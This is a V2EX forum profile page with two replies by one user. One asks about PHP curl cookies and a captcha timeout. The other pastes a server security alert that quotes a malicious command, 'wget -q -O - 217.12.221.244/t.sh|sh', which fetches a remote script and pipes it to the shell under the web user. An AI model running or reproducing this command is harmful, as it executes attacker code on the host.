V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  nohello  ›  全部回复第 1 页 / 共 1 页
回复总数  2
2020-02-23 12:57:31 +08:00
回复了 nohello 创建的主题 PHP PHP curl 带着 cookie 模拟提交,验证码超时
cookie 用的 CURLOPT_COOKIEJAR 保存的,获取验证码的 curl 里面保存的,我用 fiddler2 抓的,参数没有问题,Referer 那个后面复制过来的,那个参数复制错了,这个改了跟这个没关系,抓了 cookie,Hm_lvt_2c27f6e0da87610221a9d3a549f876bc=1582343317
Hm_lpvt_2c27f6e0da87610221a9d3a549f876bc=1582363920
Hm_lvt_c9c0128aec42c22340930c8062591842=1582343317
Hm_lpvt_c9c0128aec42c22340930c8062591842=1582363920
Hm_lvt_db4f828728fa6ba91665a269d396f166=1582343317
Hm_lpvt_db4f828728fa6ba91665a269d396f166=1582363920
Hm_lpvt_dc1d69ab90346d48ee02f18510292577=1582363087
Hm_lvt_dc1d69ab90346d48ee02f18510292577=1582363086
language=1,里面有一大堆,是不是跟这个有关系
2020-02-16 12:33:22 +08:00
回复了 nohello 创建的主题 问与答 异常网络连接-主动连接恶意下载源
该告警由如下引擎检测发现:
父进程路径:/usr/bin/bash
父进程命令行:sh -c wget -q -O - 217.12.221.244/t.sh|sh
父进程 id:6260
进程 id:6261
用户名:www
URL 链接: http://217.12.221.244/t.sh
进程路径:/usr/bin/wget
命令行参数:wget -q -O - 217.12.221.244/t.sh
与该 URL 有关联的漏洞:None
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1123 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 12ms · UTC 18:36 · PVG 02:36 · LAX 10:36 · JFK 13:36
Developed with CodeLauncher
♥ Do have faith in what you're doing.